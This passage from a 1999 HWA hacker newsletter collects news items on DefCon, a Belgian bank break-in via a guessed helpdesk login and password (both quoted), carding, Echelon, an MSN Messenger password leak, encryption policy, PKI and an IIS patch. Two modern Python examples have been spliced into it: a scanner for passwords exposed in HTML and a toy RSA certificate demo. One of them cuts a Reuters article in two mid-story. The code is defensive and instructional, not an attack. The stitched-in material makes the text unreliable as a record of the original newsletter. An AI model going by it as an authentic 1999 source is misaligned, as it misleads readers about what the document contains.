The whole idea behind DefCon is to make a place where people can meet their friends and enemies, people they may only know online; where people can learn and exchange ideas; where anyone can come and get a look inside the hacker underground and see that it’s not some dark, scary place some reporters make it out to be, but rather a preview of the movers and shakers of the next century. These people are not trying to take over the Internet, they are just trying to improve it and keep companies honest in their work and what they release. Who knows, maybe if we’d had a DefCon 20 years ago, we would not be facing the Y2K problem now, because after all, the Internet is going to be around for a long time, and these people who spend a large amount of their time online want nothing more than to see it improved.

Bronc Buster is a California-based hacker whose exploits have been featured in the LA Times.

@HWA

55.0 Y2K Survival Catalog
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by techs

Worried about Y2K? Fear the end of the world as we know it? Afraid you might run out of breath mints? Wonder how you're going to generate random numbers when the power fails? Get all of your Y2K survival needs here.

Y2K Survival Catalog
http://www.brunching.com/features/feature-y2kcatalog.html

@HWA

56.0 BELGIAN BANK COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org

by Thejian, Friday 20th August 1999 on 3:00 am CET

DeCursor.com reports today that the hacker ReDaTtAcK, who only a few days ago hacked the Belgian ISP Skynet, yesterday successfully intruded the computer systems of the Generale Bank, the biggest bank in Belgium. Making use of the bank's remote banking program and by guessing the helpdesk account's login (helpdesk) and password (hlpdsk) he was able to brute-force the user accounts on the system and in doing so he claims to have access to account info, transactions and login codes.
The bank says it won't press charges and might even ask the hacker for his assistance in fixing the problems.

@HWA

57.0 CARDING IN NEWCASTLE
~~~~~~~~~~~~~~~~~~~~~~~~~

From www.net-security.org

by Thejian, Friday 20th August 1999 on 1:00 am CET

Thieves in Newcastle are using the Internet to buy goods, charging them to other people's credit cards. Detectives have established how the thieves operate but are unsure how they are obtaining details of other people's credit cards; a lot of the victims never used the Internet to buy anything, so there is no reason why their credit details are available to third parties.

Read the story

Net theft is on the cards
19aug99

THIEVES in Newcastle are using the Internet to buy goods, charging them to other people's credit cards.

The scam has been used to buy property including $500 worth of computer software and theatre tickets.

Detectives have established how the thieves operate but are unsure how they are obtaining details of other people's credit cards.

"We are puzzled how he is finding out details of these people's accounts," Detective Senior Constable Wayne Moulton said.

"A lot of these victims have never used the Internet to buy anything so there is no reason why their credit details would be accessible."

Police said card numbers and names had been checked before the goods were dispatched, but were found to be valid and were processed by retailers.

Det Moulton said the goods were "sent to empty homes or places where the people are away

@HWA

58.0 U.S.-British Cyber-Spy System Puts European Countries on Edge
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: Zombie Cow

http://www.latimes.com:80/excite/990816/t000072952.html

Monday, August 16, 1999

Digital Nation
U.S.-British Cyber-Spy System Puts European Countries on Edge
By GARY CHAPMAN

ROVERETO, Italy--It felt like there was a new Cold War developing at a conference here last week on computers, networks and international security, only this time the adversaries are the United States and Europe and the field of conflict is cyberspace.

The revelation last year about the collaborative electronic eavesdropping system developed by the U.S. National Security Agency and British intelligence agencies, a system known as Echelon, has become a huge topic of discussion in Europe. The Echelon system can and does intercept "all e-mail, telephone and fax communications" in Europe, according to a report delivered last year to the European Parliament, and further investigations revealed that this capability also covers Australia, New Zealand and other countries.

The report's author, Steve Wright, director of Omega Foundation, a British human rights group, was here last week and summarized his investigation into Echelon. "The Echelon system forms part of the U.K.-U.S.A. system but unlike many of the electronic spy systems developed during the Cold War, Echelon is designed for primarily nonmilitary targets: governments, organizations and businesses in virtually every country," states Wright's report, "An Appraisal of Technologies of Political Control," (available on the Web at http://cryptome.org/stoa-atpc.htm). The report was prepared for the European Parliament's Scientific and Technological Options Assessment (STOA) group. Its release in early 1998 shocked European government leaders.

[snip..]
ISN is sponsored by Security-Focus.COM

@HWA

59.0 Watching the digital detectives.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.ft.com/hippocampus/q13c04e.htm

Life / Technology

SURVEILLANCE: Watching the digital detectives

Software that analyses video tape has brought total surveillance a step closer, says Alan Stewart

The recent film Enemy of the State contains a chilling account of what might happen when the security services turn on an innocent man, unwittingly involved in their affairs. The film centres on an attempt to introduce a new law allowing the US government access to the video footage from surveillance cameras in shopping malls, petrol stations and street corners. It soon becomes clear, however, that the security services are already using video from those sources.

Now, in the real world, a new software technology that can analyse and index video is being introduced by Cable News Network (CNN) to help it keep its competitive edge. Of obvious interest to television news companies, this video-searching capability is also being used by security services on both sides of the Atlantic.

"We take the incoming video signal, whether it's off a tape or satellite dish, and extract what we call 'metadata' or index data," says Paul Lego, chief executive of Virage, one of the suppliers of video search software (see accompanying story). "We like to say we watch, read, and listen to the video."

By 'watching' it, the software examines the frames of the video as they are read in, and when the picture changes sufficiently, a time-stamped 'key-frame' is stored in a database as metadata. If the video contains text (either teletext or close-captioning), this is 'read' and also time-stamped. The search software also 'listens' to the video, using an International Business Machines speech-to-text system which identifies speakers from a library of voices. "We can also, to a large degree, understand what they're saying - at least, at the key-word level," explains Mr Lego.

Transcription is not yet perfect, but an accuracy of between 30 per cent (outdoors) and 90 per cent (in a studio) is possible. Users can search the database of metadata via the internet, by keying in the name of a person and a topic. "You might get back five video clips," says Mr Lego. "You can click on any of those and the software will cue to the point where that subject is being talked about."

Mr Lego believes there is a huge government market for video analysis software, with about a third of Virage's business already being for US government agencies such as the FBI, CIA, Nasa, National Security Agency, National Image Mapping Agency, and Joint Combat Camera Command. The US Army and Air Force both use software from Islip Media, a rival video analysis company whose other users include the Department of Energy's Lawrence Livermore National Laboratory, and the National Institute of Standards and Technology.

"The government watches every TV station in the world, looking for key events," says Mr Lego, who likens it to a huge TV network for every channel in the world, with an added requirement to analyse and translate languages. "In addition, there's a lot of stuff they watch that isn't what you would call broadcast television," he adds. The UK counterparts of the US security agencies are also using the same software to enable transatlantic trading of data.

For the past few months, meanwhile, CNN has been testing a new system using Virage video analysis software, and this is now going into live operation. Twenty four hours a day, seven days a week, CNN's 1,500 editors receive 32 newsfeeds, which used to be recorded on to video tapes. Now the feeds are recorded digitally, together with the associated script and news data, so editors have access to them from their desktop. Other US TV networks are already using video analysis systems (CBS with IBM's DB2 Digital Library, and NBC with Islip's MediaSite).
European broadcasters including the BBC and Carlton in the UK and Spain's Telecinco and Network España have expressed interest or are running pilot schemes. Beyond news analysis, other TV uses of the software are digitising and indexing archives, adapting news for the web, and tracking newscasts of rival TV networks (being piloted in the US by Fox News and TimeWarner).

Mark Juliano, Islip's chief executive, says internet-based searchable television is now a technical reality, with real-time searchable TV around the corner. "This would allow any wired home or business user to search for topics of interest on all channels currently broadcasting, as well as in stored programming," he says.

Outside the TV industry, investment banks such as Goldman Sachs, Merrill Lynch and Morgan Stanley are testing the software for monitoring any mention of specific companies on financial news networks. The Harvard Business School has digitised its study material, which students can search using video analysis. General Motors is using the software to simplify searching through several hundred hours of digitised focus group sessions.

The internet has fundamentally changed the model of searchable video, according to John Zappa, Islip's vice-president of marketing. "Previously, video cataloging, search and retrieval tools were aimed at a select group of media companies," says Mr Zappa. "Now, any company can easily put their video content on the internet."

The introduction of video analysis and indexing technology can certainly bring benefits for business and consumer. But new technologies can have their drawbacks too. The snooping scenario envisaged by Enemy of the State may simply be a little late in its arrival.

Software that's got it taped

Virage's VideoLogger software is able to index video automatically and simultaneously, to digitise multiple video formats, and output information to any video application or database. The latest version supports plug-in video analysis engines for real-time facial and optical character recognition. VideoLogger works with the company's AudioLogger real-time speech recognition and speaker identification software. US-based Virage recently demonstrated a consumer version of VideoLogger, which the company claims will unlock the content of streaming video files on the internet.

International Business Machines has developed a News Archive system using its DB2 Digital Library database technology. The Digital Library is used by some of the world's largest media collections, such as the US Library of Congress, the Vatican Library in Rome, the State Hermitage Museum in St Petersburg, Russia, and the National Palace Museum in Taiwan. The News Archive system lets users search video clips via precoded parameters, such as clip date, subject name, producer, and location, or carry out free-text searches of text notes and scripts. IBM's "query by image content" allows a search for clips according to their shape and colour.

A spin-off from Carnegie-Mellon University in Pittsburgh, Pennsylvania, Islip (Integrated Speech, Language, and Image Processed) Media has licensed the technology base and software of the university's Informedia Digital Library project. Islip's MediaSite system consists of several modules, including creation and search tools. Islip's MediaSite.net web site is a clearing-house for stock footage, news and information, training and education video content, which users can search and pay for via the web. Virage has recently launched a similar service, Virage Interactive, as a hosted index of searchable video.

Excalibur Technologies' text searching software is used by many organisations, including the two leading political parties in the UK. The company, also US-based, has recently introduced its Excalibur Screening Room video analysis system, and has teamed up with StorageTek, the disc storage company, to provide large digital video repositories.
@HWA

60.0 Microsoft acknowledges software glitch that exposes e-mail passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: William Knowles

Microsoft acknowledges software glitch that exposes e-mail passwords

WASHINGTON (August 19, 1999 10:00 p.m. EDT http://www.nandotimes.com)

Microsoft Corp. said Thursday that a bug in its new Internet chat software permits coworkers and others to see a person's e-mail password. It promised to fix it by week's end.

The glitch in the company's new "MSN Messenger" software means that others who have access to a person's computer could impersonate that person to read and even send e-mail using his "Hotmail" account without anyone's knowledge. Microsoft said that even if customers delete their saved password and enter it manually, it still becomes visible if another person types a specific sequence of keystrokes on that computer.

Microsoft, whose software runs most of the world's personal computers, promised to fix the problem by the end of Friday. The company said it was made aware of the bug earlier this week.

Deanna Sanford, the product manager for MSN, said the bug's ill effects were mitigated because a person must have physical access to the victim's computer, meaning the problem will be worse in offices where coworkers share machines than for home users.

"In a shared office environment, if you trust the people you work with, this will probably never be an issue," Sanford said. But she said Microsoft recommends protecting each computer with a password.

The problem was the latest embarrassment for Microsoft over its attempt to capture part of the burgeoning market for Internet chat software, currently dominated by America Online Inc.'s "Instant Messenger" software. When Microsoft unveiled its chat software earlier this month, AOL complained that Microsoft engineers had hacked into its proprietary network to let MSN customers communicate with AOL's customers.
AOL successfully blocked Microsoft's software several times, but with each attempt Microsoft redesigned its chat software to bypass AOL's blocking attempts. MSN Messenger customers currently can chat with people using AOL's software, and Microsoft - in a bid for the moral high ground - announced earlier this week it will release its software protocols so that other companies can design software that interoperates with MSN.

The latest Microsoft bug occurs when customers use the software to check their e-mail using Microsoft's popular Web-based "Hotmail" service. If a person stops the resulting Internet page from loading and looks at the underlying software code - which requires merely three clicks with the mouse - the user's e-mail name and password are displayed in plain view. Sanford said Microsoft will scramble the information in the upcoming patched version using encryption technology.

ISN is sponsored by Security-Focus.COM

@HWA

61.0 U.S to seek new computer surveillance power
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: William Knowles

U.S. To Seek New Computer Surveillance Power
http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html

WASHINGTON (Reuters) [8.20.99] - The Justice Department is seeking new powers to break into private premises and disable security precautions on personal computers as a prelude to a wiretap or further search, the Washington Post reported Friday.

The department wanted to make it easier for law enforcement authorities to get search warrants that would let them monitor suspects' computerized records after break-ins, said the paper, citing documents and interviews with Clinton administration officials.

``In a request set to go to Capitol Hill, Justice officials will ask lawmakers to authorize covert action in response to the growing use of software programs that encrypt, or scramble, computer files,'' the report said.
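The MSN Messenger problem in item 60.0 above is a page that carries the user's login name and password in its own markup, where a "view source" on a half-loaded page reveals them. As an added example (not Microsoft's code and not a reproduction of the bug), here is the sort of check a defender can run over rendered HTML before it ships: it parses the page and reports any form field or link query parameter that hands a password-like value to the browser in the clear. The sample pages and the field names are constructed; the safer page shows the alternative of passing only a short-lived server-issued token.

```python
"""Flag credentials left in plain view in a page's HTML source.

Added example, not Microsoft's code: a review check for pages that embed
a user's login name and password in the markup (hidden inputs, links).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Field / parameter names that must never carry a literal secret in markup.
# Assumed list for this example.
SECRET_NAMES = {"password", "passwd", "pwd", "pass"}


class CredentialSniffer(HTMLParser):
    """Collect secret-like values from form inputs and URL query strings."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (where, field name, value)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            name = (a.get("name") or "").lower()
            value = a.get("value") or ""
            if name in SECRET_NAMES and value:
                self.findings.append(("input", name, value))
        # Links, embedded resources and form targets that carry credentials
        # in the query string are just as visible in the source.
        for attr in ("href", "src", "action"):
            url = a.get(attr)
            if url:
                self._scan_url(attr, url)

    def _scan_url(self, where, url):
        query = urlsplit(url).query
        for name, values in parse_qs(query).items():
            if name.lower() in SECRET_NAMES:
                for v in values:
                    if v:
                        self.findings.append((where, name.lower(), v))


def find_exposed_credentials(html: str):
    """Return a list of (where, field, value) for secrets found in the HTML."""
    p = CredentialSniffer()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: a bridging page that auto-posts the user's login on to
# a webmail service, with the secret written straight into the markup.
LEAKY_PAGE = """<html><body onload="document.f.submit()">
<form name="f" method="post" action="https://mail.example.test/login">
<input type="hidden" name="login" value="someuser">
<input type="hidden" name="password" value="s3cret-example">
</form>
<a href="https://mail.example.test/inbox?login=someuser&amp;pwd=s3cret-example">mail</a>
</body></html>"""

# Constructed sample of the safer pattern: the browser is handed only a
# short-lived, server-issued token, never the password itself.
SAFE_PAGE = """<html><body>
<form method="post" action="https://mail.example.test/login">
<input type="hidden" name="login" value="someuser">
<input type="hidden" name="ticket" value="opaque-one-time-token">
</form></body></html>"""

if __name__ == "__main__":
    for where, field, value in find_exposed_credentials(LEAKY_PAGE):
        print(f"exposed {field!r} via {where}: {value}")
    print("safe page findings:", find_exposed_credentials(SAFE_PAGE))  # []
```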
Such encryption makes computers inaccessible to anyone who lacks a special code or ''key.'' Justice officials worry that such software ``is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime and the distribution of child pornography,'' the Post quoted an Aug. 4 memo by the department as saying. Under the proposed ``Cyberspace Electronic Security Act,'' investigators armed with a sealed warrant could comb computers for passwords and install devices that override encryption programs, the Post reported, citing the Justice memo. To pull information from a targeted computer, agents would still be required to get additional authorization from a court, the paper said. Justice officials were not immediately available for comment. The proposal is the latest in a years-long tug-of-war between the government and computer users who want to protect their privacy by encrypting documents. [snip..] ISN is sponsored by Security-Focus.COM @HWA 62.0 Code cracker worries cryptographers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.newspage.com/cgi-bin/NA.GetStory?story=h0812161.902\&date=19990813\&level1=46510\&level2=46515\&level3=821 Code Cracker Worries Cryptographers August 13, 1999 WORCESTER, MASS. - The Associated Press via NewsEdge Corporation : A developer of one of the most widespread computer encryption systems said Thursday he has designed a computer that could crack open a file encoded using the most common form of data encryption in only a few days. If built _ at an estimated cost of about $2 million _ such a computer could jeopardize the privacy of the bulk of electronic commerce as practiced today, according to cryptographers at the conference where the design was shown. Most highly sensitive military, banking and other data are protected by stronger encryption keys beyond its reach. 
The commonly used weaker keys, though, would become ``easy to break for large organizations,'' said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed the new computer design and helped invent the widespread coding system _ known as RSA public-key encryption _ that it attacks.

Shamir spoke at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute.

Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key _ a sequence of 1s and 0s, or bits _ unlocks the secret coding of a computer transmission so it can be deciphered.

Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light emitting diodes.

The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever _ within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months.

[snip..]

ISN is sponsored by Security-Focus.COM

@HWA

63.0 AntiOnline offers infosec website hosting
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Straight from a message from Antionline's mailing list;

AntiOnline is proud to announce its new "InfoSec Community". This community allows individuals with an interest in information security and technology to share their thoughts, information, and files with others who have similar interests.

Here are some of the benefits of becoming an AntiOnline InfoSec Community Member:

* Start out with 5 free megs. Get free upgrades up to 100 megs as your site grows.
* Your address will be: http://www.AntiOnline.com/members/YOUR-NAME
* Your site will be indexed by AntiSearch, which draws thousands of people a day who are looking for information related to information security.
* You can upload files you create on your computer directly to your site via a simple upload form.
* Simple web-based editors help you create a page even if you're not an HTML wiz.
* Each week AntiOnline will spotlight a community site on its main page. If chosen, this guarantees that your work will be seen by thousands of people in the information security industry!
* A great place to distribute documents and programs that you've written! Also a great place to stick a resume!
* Once your webpage is in place and attracting visitors, you can request a message board or guestbook to be hosted by AntiOnline.com for you, free of charge!

Visit The Following URL To Sign Up For Your Own Account!
http://www.AntiOnline.com/members/cgi-bin/new.cgi

------------------------------------------------------------------------------------
Get Your Free AntiOnline E-mail Account: http://www.AntiOnline.com/mail/
Keep An EYE On The Underground: http://www.AntiOnline.com/eye/
Learn To FIGHT-BACK against malicious hackers: http://www.AntiOnline.com/fight-back/
Search Security Sites: http://www.AntiSearch.com/
Exploits Sorted By OS: http://www.AntiCode.com/
------------------------------------------------------------------------------------

@HWA

64.0 PKI yesterday today and tomorrow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PKI: Yesterday, Today, Tomorrow
A Hurwitz Group Exclusive Analysis
By Diana Kelley

August 23, 1999 - For the past three years or so the rallying cry from the major PKI vendors has been, "This is the year of PKI!" While it's true that PKI has made some significant inroads into organizations, most notably ScotiaBank in Canada and the ANX PKI created by the US automobile industry, we are still some distance from the "Year of PKI."
In practice many companies have spent time and effort prototyping PK-Islands, independent disconnected solutions that fail to support true business-to-business applications. Frustrated by investments in time and money with little visible return, many organizations have temporarily halted PKI work. What's caused this slowdown in adoption, and is there a change in the landscape that signals a new phase for PKI?

What is it?

PKI. It's a great buzzword, but what is it exactly? A large part of the confusion in the industry can be directly correlated to a muddied perception of what PKI is and what it can do for business. PKI is shorthand for Public Key Infrastructure. It is based on the concept of public key cryptography, which uses a key pair, a public key and a private key, to perform various cryptographic functions. Public key cryptography differs from the more traditional symmetric key cryptography, which uses the same key for encryption and decryption. Symmetric key cryptography is fast and efficient but has a major drawback: it requires that the parties find a way to share the single key secretly in advance of the communication session. In a closed environment this is not a difficult accomplishment, but when two parties are meeting for the first time in a public digital environment such as the Internet it is almost impossible to arrange a convenient manner to exchange a secret key. By splitting up the cryptographic functions between a public and a private key, public key cryptography enables parties that have never met before to communicate in an encrypted manner.

How the Keys are Used

Security services provided by public keys include authentication and non-repudiation through the use of digital signatures, and confidentiality of communication in transit. The public and private keys are linked mathematically, but one should not be capable of being derived from the other. If the private key could be derived from the public key it would break the security of the system.
In practice, the public key is available to the public; it can be sent on request by the owner or stored in a central server. The private key should be kept secret by the owner, either on the holder's hard drive or on a device such as a smartcard.

Encrypted Communications

Public key cryptography can be used to encrypt a communication before sending it over untrusted networks, such as the Internet. The sender encrypts the message using the recipient's public key. Depending on the distribution method the sender could request the public key directly from the intended recipient, or look up the public key in an available key repository. Upon receipt the recipient uses her private key to decrypt the data. Data that has been encrypted using a public key can only be decrypted using the related private key. This technique can be extended to data that resides on hard drives as well, to provide secure storage.

Digital Signatures

The other most common use of public key cryptography is to provide authentication and non-repudiation using digital signatures. A signature is created by creating a hash of the data and then encrypting this with the sender's private key. The recipient performs the same hash function on the data to create a value. Using the sender's public key, the recipient decrypts the digital signature to discover the sender's hash value of the message. If the two values match, the recipient knows conclusively that the message has not been tampered with and that it was sent by someone in possession of the sender's private key.

Components of PKI

The PKI itself is the set of protocols and systems used to manage and distribute the keys and certificates. There is no single definition of what constitutes a PKI, although many organizations, including the IETF (Internet Engineering Task Force), The Open Group, and NIST (National Institute of Standards and Technology), are working on various PKI-related standards.
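The following Python script is an added worked example, not part of the Hurwitz article, that walks through the two operations just described (encrypt to a recipient's public key; hash-then-sign with the sender's private key and check with the public key) and then uses the same signing routine for the CA, certificate and CRL roles the article lists under "Components of PKI". It uses textbook RSA built on SHA-256 and two fixed Mersenne primes per party, a JSON record as a stand-in for an X.509v3 certificate, and a Python set as the CRL; all names (CA_PRIMES, issue_certificate, validate_certificate and so on) are mine. The fixed primes make the keys a teaching aid only; a real PKI generates keys from fresh random primes and pads before signing or encrypting.

```python
import hashlib
import json

# Constructed toy keys: each party's modulus is the product of two fixed,
# publicly known Mersenne primes.  Teaching aid only, never a real key.
CA_PRIMES = ((1 << 127) - 1, (1 << 521) - 1)
USER_PRIMES = ((1 << 107) - 1, (1 << 607) - 1)


def make_keypair(primes, e=65537):
    """Textbook RSA: public key (n, e), private key (n, d)."""
    p, q = primes
    n, phi = p * q, (p - 1) * (q - 1)
    d = pow(e, -1, phi)            # modular inverse (Python 3.8+)
    return (n, e), (n, d)


def _hash_int(data):
    # SHA-256 digest as an integer; it is smaller than either toy modulus.
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def sign(private_key, data):
    """Hash the data, then 'encrypt' the hash with the private key."""
    n, d = private_key
    return pow(_hash_int(data), d, n)


def verify(public_key, data, signature):
    """Recover the signer's hash with the public key and compare with our own."""
    n, e = public_key
    return pow(signature, e, n) == _hash_int(data)


def encrypt(public_key, message):
    """Confidentiality: anyone can encrypt to the recipient's public key."""
    n, e = public_key
    m = int.from_bytes(message, "big")
    if m >= n or message[:1] == b"\x00":
        raise ValueError("toy scheme: message must be short and not start with a zero byte")
    return pow(m, e, n)


def decrypt(private_key, ciphertext):
    """Only the matching private key recovers the plaintext."""
    n, d = private_key
    m = pow(ciphertext, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def _tbs_bytes(body):
    # Canonical "to-be-signed" encoding of the certificate body.
    return json.dumps(body, sort_keys=True).encode()


def issue_certificate(ca_name, ca_private, serial, subject, subject_public):
    """CA role: bind a subject name to a public key and sign the binding."""
    body = {"serial": serial, "subject": subject, "issuer": ca_name,
            "public_key": list(subject_public)}
    return {"tbs": body, "signature": sign(ca_private, _tbs_bytes(body))}


def validate_certificate(cert, ca_name, ca_public, crl):
    """Relying-party role: check issuer, CA signature, then the CRL."""
    body = cert["tbs"]
    if body["issuer"] != ca_name:
        return False, "unknown issuer"
    if not verify(ca_public, _tbs_bytes(body), cert["signature"]):
        return False, "bad CA signature"
    if body["serial"] in crl:          # CRL: the set of revoked serial numbers
        return False, "certificate revoked"
    return True, "ok"


if __name__ == "__main__":
    ca_pub, ca_priv = make_keypair(CA_PRIMES)
    alice_pub, alice_priv = make_keypair(USER_PRIMES)
    cert = issue_certificate("Toy CA", ca_priv, 7, "alice", alice_pub)
    print(validate_certificate(cert, "Toy CA", ca_pub, crl=set()))
    print(validate_certificate(cert, "Toy CA", ca_pub, crl={7}))
    msg = b"pay bob 100"
    print(verify(alice_pub, msg, sign(alice_priv, msg)))
```

Two things worth noticing when running it: changing a single field of the certificate body (say the subject) invalidates the CA signature even though the signature bytes are untouched, which is exactly the integrity property the article attributes to signatures; and a perfectly valid signature still fails validation once the serial number appears in the CRL, which is why the article treats CRL scalability as a separate operational concern from the cryptography.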
In general, most PKIs include a standard set of components as listed below.

Registration Authority (RA) - The trusted entity that certifies the identity of the user

Certification Authority (CA) - The trusted entity that issues public key certificates

Certificate Repository - The server or system where public key certificates are held

Certificates - The records that contain structured information about the owner, including the owner's name, public key and the name of the issuing authority. The current standard for public key certificates is X.509v3.

Certificate Revocation Lists (CRLs) - The listing of revoked or suspended public key certificates.

What Happened?

After looking at public key cryptography a lot of companies thought, "Wow, this is really neat technology!" And they were right. But even the most sophisticated technology in the world is of no use unless it can be applied directly to the solution of a business/consumer problem. In the mad frenzy to become an Internet-enabled e-Business, many companies rushed towards implementation of PKI without first taking the time to define their business requirements. Without a clear business goal to build toward, even the best technology in the world will fail to be successful.

Business Need vs. Media Hype

What, then, are the business needs? Any organization that is planning to transform to an e-Business needs to answer the following questions:

- What is the business problem?
- What are the available technologies to solve the problem?
- What fits in best with our environment?

Specific requirements vary depending on the line of business, unique needs of the business units, and market-based needs driven by industry. Within this spectrum, there are some basic e-Business needs that cut across most industries.
These include:

- Availability to the global market for 24x7x365 selling and support
- Rapid deployment to keep pace with the competition
- Enhanced customer experience achieved using personalization technologies
- Increased control over the supply chain to reduce inventory turn time
- Privacy of communications
- Non-repudiability of transactions

That's quite a long list, and no single technology can provide answers to each one. Smart e-Businesses must select the most appropriate technologies to solve each problem. In the case of PKI, it is extremely well suited to provide solutions for the last two bullets, but does not directly provide an answer to the other e-Business issues.

Reality Sets In

When the media hype surrounding PKI hit the marketplace a few years ago there was a lot of misrepresentation and promise surrounding what PKI could actually do. The combination of a mixed media message and a lack of defined goals within business is one of the main reasons that many companies were disappointed with their early implementations of PKI technology. Creating a distributed, scalable PKI is not an easy task. This complexity has given rise to a number of factors that have contributed to failed or stalled PKI implementations.

Lack of Interoperability

If companies don't want to find themselves stranded on their own PK-Island they need to plan to integrate with other installations. This is easier said than done. X.509 certificates are not always interoperable, and many of the PKI vendors cannot provide cross-certification and certificate validation across vendors.

Cost

A lack of standards exists in pricing schemes as well. Some vendors charge per certificate, others per number of users, and others still by number of servers. The result is a confusing tangle; when it is finally sorted out, most companies find that the cost of the PKI will be much higher than originally expected.
Legacy Applications that aren't PK-enabled

Public key technology is great, but it needs to be linked directly into an application to add business value. Legacy systems and ERP applications are not enabled for PKI. Packaged application vendors are beginning to build in support for PKI, but until now the only way to integrate certificates into the back office has been through an investment in developer time and resources.

Scalability Issues

Because PKI is in its infancy there have not been a number of large distributed installations. Scalability of the CRLs (Certificate Revocation Lists) is a concern for organizations that will deal with large numbers of revoked certificates. Scalability and performance concerns include excessive time delays, high processing loads and the need for additional bandwidth.

Not Customer Centric

Private keys are pieces of data that need to be stored someplace. One of the biggest benefits of e-Business is ease of access and mobility. Using any available web browser people can check stock prices, read and write email, and bank on-line from a variety of locations and systems. If a certificate is required for access then user mobility is limited to the system where the certificate is stored. Smartcards are a possible solution to this dilemma but they are still too limiting; the free Internet terminal at the airport doesn't have a smartcard reader, does it?

What Next?

If PKI implementations have been so difficult to deploy successfully up to now, what has changed that makes it right for today's e-Business? One need look no further than ScotiaBank and the ANX PKI for answers. Both of these were well-thought-out implementations of PKI to solve a specific business problem. The abilities to encrypt transactions between parties and provide non-repudiation services to consumers are cornerstones of e-Business. Already there have been some very successful uses of PKI in VPN implementations and for email.
In the future, as the transformation to the e-Business paradigm progresses, the boundaries between internal and external networks will disappear. In this newly open and interconnected world PKI has the opportunity to provide targeted business solutions in a number of areas. As communications between applications and devices increase, look for an increase in certificates that are issued to devices such as routers and firewalls to manage secure communications. Using the time stamping feature contained in some PKIs, organizations can protect auditing and logging data and store it encrypted. For high security sites, content could be protected on a page-by-page basis. And with the ascendance of Directory Services in the enterprise, organizations are discovering a central repository with a shared query language (LDAP) that can be used to store and distribute certificates.

PKI has an important place in the future of e-Business. The trick is for companies to establish the business problem that needs to be solved first and then match the PKI solution appropriately. When companies address a business need with the right technology everybody wins.

Diana Kelley (dkelley@hurwitz.com) is a Senior Security Analyst at Hurwitz Group, Inc. (www.hurwitz.com), the leading analyst and advisory firm focused on strategic e-Business applications. Hurwitz Group partners with clients to enable their success in applying electronic business strategies for maximum growth and competitive advantage.
Related Links

General Sites

American Bar Association - Digital Signature Guidelines
The Ten Minute CEO Briefing on PKI, Digital Certificates, and Trust in Electronic Transactions - 5 Questions every CEO should be able to answer
International Chamber of Commerce: General Usage for International Digitally Ensured Commerce

Government Sites

NIST PKI Technical Working Group
Federal PKI Steering Committee
Government of Canada's PKI

PKI Vendors & Standards

@HWA

65.0 Microsoft Advisory, double byte code page vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox.

********************************

Re-release of Patch for "Double Byte Code Page" Vulnerability
-------------------------------------------------------------

August 20, 1999

Issue
=====

Microsoft has identified and corrected a regression error in the IIS 4.0 version of the previously-released patch for the "Double Byte Code Page" vulnerability. The corrected patch has been re-released, and an updated security bulletin is available at http://www.microsoft.com/security/bulletins/ms99-022.asp.

Details
=======

Shortly after releasing the patch for the "Malformed HTTP Request Header" vulnerability (http://www.microsoft.com/Security/Bulletins/ms99-029.asp), Microsoft discovered a regression error in it. We investigated all previously-released patches to determine whether any others were affected by the error, and discovered that one other patch was affected -- the IIS 4.0 version of the patch for the "Double Byte Code Page" vulnerability. On August 16, 1999, we re-released the patch for the "Malformed HTTP Request Header" vulnerability, and today are re-releasing the patch for the "Double Byte Code Page" vulnerability.
We have verified that no other security patches are affected by this vulnerability, and have corrected our code base to eliminate the error from all future IIS 4.0 releases.

The regression error is completely unrelated to the vulnerabilities, and does not change our diagnosis of either. The error occurs if the IIS log file grows to a size that is an exact multiple of 64KB; if this happens, the server will hang. The problem can be resolved by stopping the IIS service, starting a new log file, and restarting the IIS service. The regression error affected only IIS 4.0, and was introduced after Windows NT 4.0 Service Pack 5.

How to Identify the Re-released Patches
=======================================

- The re-released patches for the "Double Byte Code Page" are timestamped August 17, 1999. (Please note that the IIS 3.0 patches were unaffected by the regression error, so they are still timestamped June 24, 1999).
- The re-released patches for the "Malformed HTTP Request Header" are timestamped August 12, 1999.

What Customers Should Do
========================

You do not need to take any action if ANY of the following apply to you:
- You are running IIS 3.0.
- You have not installed any IIS 4.0 patches released after Windows NT 4.0 Service Pack 5.
- You have installed the re-released patch for the "Malformed HTTP Request Header" vulnerability.

You need to take action if ALL of the following apply to you:
- You applied the original version of either the "Double Byte Code Page" patch or the "Malformed HTTP Request Header" patch.
- You have not applied the re-released version of either patch.

